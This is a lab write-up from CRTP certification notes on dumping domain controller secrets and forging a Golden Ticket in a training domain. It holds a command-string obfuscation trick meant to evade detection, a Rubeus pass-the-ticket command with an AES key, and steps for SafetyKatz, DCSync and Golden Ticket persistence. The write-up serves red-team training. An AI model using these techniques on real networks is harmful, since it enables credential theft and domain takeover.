CRTP Lab 8

Task 1

Extract secrets from the domain controller of dollarcorp.

Since we have DA privs, we can extract all hashes on DC.

Let's start a process as DA from elevated cmd of student.

# Run ArgSplit for asktgt
C:\Users\student372>cd \AD\Tools

C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"
C:\AD\Tools>set "z=t"
C:\AD\Tools>set "y=g"
C:\AD\Tools>set "x=t"
C:\AD\Tools>set "w=k"
C:\AD\Tools>set "v=s"
C:\AD\Tools>set "u=a"
C:\AD\Tools>set "Pwn=%u%%v%%w%%x%%y%%z%"

# Get DA shell as svcadmin

C:\AD\Tools>C:\AD\Tools\Rubeus.exe %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

To dump hashes:

  • Copy Loader from student to dcorp-dc

  • Spawn cmd on dcorp-dc

  • Set up portforward to run SafetyKatz

  • Finally, run SafetyKatz

Note: We only get NTLM hashes using "lsadump::lsa /patch".

Let's use DCSync to dump both, NTLM and AES hashes.

Task 2

Using the secrets of krbtgt account, create a Golden ticket.

Using the KRBTGT hashes, we can now perform Golden Ticket attack to maintain persistence.

It prints the command to recreate the ticket.

Task 3

Use the Golden ticket to (once again) get domain admin privileges from a machine.

Finally we can get a shell as dcorp-dc

PreviousGolden TicketNextSilver Ticket

Last updated